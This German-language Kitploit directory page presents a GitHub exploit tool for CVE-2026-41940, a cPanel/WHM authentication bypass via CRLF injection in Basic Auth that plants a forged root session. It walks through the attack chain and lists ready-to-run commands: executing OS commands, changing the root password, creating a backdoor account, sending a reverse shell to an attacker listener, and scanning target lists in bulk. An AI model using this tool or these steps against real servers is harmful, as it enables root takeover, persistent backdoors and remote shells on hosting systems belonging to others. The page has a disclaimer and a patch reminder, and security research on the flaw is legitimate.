Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41940 — cPanel/WHM-Authentifizierungsumgehung (Zero-Day-Sicherheitslücke) | Kitploit
Tools/GitHubGitHub/0xyur1/cve-2026-41940
Authentifizierung & AutorisierungSchwachstellenscannerExploitationWebanwendungs-ExploitationPost-ExploitationWebsicherheitPenetrationstestsAuthentifizierungRed Teaming
GitHub0xyur1/cve-2026-41940

CVE-2026-41940

cPanel/WHM-Authentifizierungsumgehung (Zero-Day-Sicherheitslücke)

102vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2026-41940: cPanel/WHM Authentifizierungs-Bypass (Einzel- & Multi-Ziel)

Haftungsausschluss: Dieses Dokument und das zugehörige Skript (exploit.py) werden ausschließlich für Bildungszwecke, Sicherheitsforschung und autorisierte Penetrationstests bereitgestellt. Verwenden Sie diese Software nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.

Übersicht

exploit.py ist ein Skript, das eine Authentifizierungs-Bypass-Schwachstelle (CVE-2026-41940) in cPanel & WHM demonstriert. Die Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer, über einen CRLF-Injektionsfehler eine Root-Sitzung in den Daemon-Cache einzuschleusen, was letztendlich Root-Level-Zugriff auf WHM ohne gültige Anmeldeinformationen gewährt.

Schwachstellenanalyse & Exploit-Ablauf

Der Exploit nutzt eine CRLF-Injektionsschwachstelle (Carriage Return Line Feed) im Basic-Authentication-Handling-Mechanismus, kombiniert mit einem Fehler bei der Sitzungsweitergabe. Das Skript automatisiert den Angriff in vier Phasen:

  1. Pre-Auth-Sitzungserstellung: Verbindet sich mit öffentlichen Login-Endpunkten (z. B. /login/ oder /cgi/login.cgi), um ein Basis-Sitzungscookie ohne Authentifizierung zu erhalten (whostmgrsession).
  2. CRLF-Injektion: Sendet einen manipulierten Basic-Authentication-Header, der ein Base64-kodiertes Payload enthält, das Root-Sitzungsfelder direkt in den cpsrvd-Sitzungscache injiziert. Die Weiterleitungsantwort des Servers gibt das generierte Sicherheitstoken (cpsess) preis.
  3. Sitzungsweitergabe: Das rohe Sitzungscookie wird an einen authentifizierten WHM-Endpunkt gesendet, wodurch do_token_denied ausgelöst wird, um die gefälschte Sitzung in den Daemon-Cache zu propagieren – sie wird zu einer gültigen authentifizierten Sitzung.
  4. Verifizierung: Greift mithilfe der gefälschten Sitzung auf eingeschränkte WHM-API-Endpunkte zu (z. B. /json-api/version), um den Root-Level-Zugriff zu bestätigen.

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek
root@kitploit:~
pip install requests

Verwendung

root@kitploit:~
python exploit.py --target <URL> [options]
python exploit.py --target-file <FILE> [options]

Argumente

Zielauswahl

ArgumentBeschreibung
--target URLEinzelne WHM-URL (z. B. https://target:2087)
--target-file FILEDatei mit Zielen (ein ip:port pro Zeile) – aktiviert automatisch den Prüfmodus

Netzwerk- & Kernoptionen

Exploit-Optionen (nach dem Bypass)

Ausgabeoptionen

ArgumentBeschreibung
--output FILESitzungstoken und Details in einer JSON-Datei speichern

Beispiele

root@kitploit:~
# Check if target is vulnerable
python exploit.py --target https://target:2087 --check

# Dump server info (version, accounts, privileges)
python exploit.py --target https://target:2087 --dump

# Generate a one-click root login URL (paste in browser immediately)
python exploit.py --target https://target:2087 --session

# Execute a command
python exploit.py --target https://target:2087 --exec "id"

# Drop into an interactive WHM shell
python exploit.py --target https://target:2087 --shell

# Change root password
python exploit.py --target https://target:2087 --password 'NewP@ss!'

# Call WHM API directly
python exploit.py --target https://target:2087 --api version
python exploit.py --target https://target:2087 --api listaccts --api-params api.version=1

# Create a backdoor cPanel account
python exploit.py --target https://target:2087 --add-user myuser 'Pass123!' example.com

# Send reverse shell
python exploit.py --target https://target:2087 --revshell YOUR_IP 4444

# Override hostname (use when auto-discovery fails)
python exploit.py --target https://1.2.3.4:2087 --hostname whm.server.net --check

# Scan multiple targets (check-only mode)
python exploit.py --target-file ips.txt
python exploit.py --target-file ips.txt --threads 20

# Save session to file
python exploit.py --target https://target:2087 --dump --output results.json

Interaktive Shell-Befehle

Wenn Sie --shell verwenden, stehen folgende Befehle zur Verfügung:


Erinnerung

Installieren Sie die neuesten cPanel/WHM-Sicherheitspatches umgehend.

Tool herunterladen
ArgumentBeschreibung
--threads NGleichzeitige Threads für den Multi-Ziel-Modus (Standard: 10)
--hostname HOSTHost-Header überschreiben – verwenden, wenn die automatische Erkennung fehlschlägt oder einen falschen Hostnamen liefert
--timeout NTimeout pro Anfrage in Sekunden (Standard: 15)
--retries NAnzahl der Wiederholungen bei Netzwerkfehlern (Standard: 3)
--cookie-name NAMEEin bestimmtes Sitzungscookie erzwingen (automatisch erkannt, wenn weggelassen)
--no-verifyStufe-4-Verifizierung überspringen und trotzdem fortfahren
ArgumentBeschreibung
--checkNur-Prüfmodus – Schwachstelle verifizieren, ohne sie auszunutzen (automatisch mit --target-file gesetzt)
--password PASSDas Root-Passwort auf PASS ändern
--api FUNCEine bestimmte WHM-JSON-API-Funktion aufrufen
--api-params K=V,...Kommagetrennte Parameter für --api
--exec CMDEinen OS-Befehl über WHM scripts/run_script ausführen (Fallback: rawexec)
--sessionEine Root-Ein-Klick-Login-URL generieren – sofort öffnen, Token läuft schnell ab
--shellIn eine interaktive WHM-Shell wechseln (nur Einzelziel)
--dumpServerinformationen ausgeben: Version, Konten, DNS-Zonen, Berechtigungen
--add-user USER PASS DOMAINEin neues cPanel-Hosting-Konto erstellen
--revshell LHOST LPORTEine Bash-Reverse-Shell an Ihren Listener senden
BefehlBeschreibung
api <function> [k=v ...]Eine WHM-JSON-API-Funktion aufrufen (z. B. api version)
exec <command>Einen OS-Befehl über WHM ausführen (z. B. exec id)
passwd <newpass>Das Root-Passwort ändern
dumpServerinformationen ausgeben
revshell <lhost> <lport>Eine Reverse-Shell senden
add <user> <pass> <domain>Ein cPanel-Konto erstellen
save <path>Die aktuelle Sitzung in einer Datei speichern
exit / quitDie Shell beenden